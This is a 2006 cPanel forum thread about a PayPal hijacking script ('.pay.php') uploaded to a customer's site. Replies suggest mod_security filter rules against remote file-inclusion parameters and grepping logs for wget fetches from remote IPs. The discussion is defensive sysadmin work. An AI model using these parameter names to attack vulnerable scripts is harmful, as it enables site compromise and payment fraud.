The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

PayPal hijack -- FYI

Discussion in 'General Discussion' started by laborspy, Jun 7, 2006.

  1. laborspy

    laborspy Well-Known Member

    Joined:
    Feb 7, 2004
    Messages:
    94
    Likes Received:
    0
    Trophy Points:
    6
    One of my users was hijacked today. It appears that someone used his website to upload a script named '.pay.php'. It was a PayPal hijacking script.


    Here is what the script looked like.
    http://www.devtop.com/bad.no

    Prevent via mod_security add
     
    #1 laborspy, Jun 7, 2006
    Last edited: Jun 7, 2006
  2. WEB-PROS

    WEB-PROS Well-Known Member

    Joined:
    Feb 19, 2006
    Messages:
    111
    Likes Received:
    0
    Trophy Points:
    16
    With that mod_secuirty filter can't they just change the name of the file???
     
  3. bmcgrail

    bmcgrail Well-Known Member

    Joined:
    Dec 8, 2003
    Messages:
    83
    Likes Received:
    0
    Trophy Points:
    6
    here are a few sec_mod filters I use to stop repeated abuse attempts against unsecure scripts.

    SecFilter pathtoashnews=
    SecFilter absolute_path=
    SecFilter root_path=

    grep your domain logs for the pay.php and then do it for wget and look for the command right before http://remoteip. Then block that so they can't upload any scripts. wget won't show 100% of exploits but its a good start.
     
  4. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
  5. netlook

    netlook Well-Known Member
    PartnerNOC

    Joined:
    Mar 25, 2004
    Messages:
    335
    Likes Received:
    0
    Trophy Points:
    16
  6. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    I have contacted the developer for more information regarding this. Without seeing an active attack yet I cannot write a rule set for it at this time.
     
  7. ramprage

    ramprage Well-Known Member

    Joined:
    Jul 21, 2002
    Messages:
    667
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Canada
    The developers will not provide this, I'm not suprised.

    Fantastico sure is doing a great job at keeping our systems secure by updating with the software providers. Latest version on Coppermine website is 1.4.8

    Latest stable Fantastico is
    New Installation (1.4.2)
     
  8. easyhoster1

    easyhoster1 Well-Known Member

    Joined:
    Sep 25, 2003
    Messages:
    659
    Likes Received:
    0
    Trophy Points:
    16
    Latest cpanel version is....Coppermine (1.3.3):rolleyes:
     
Loading...

Share This Page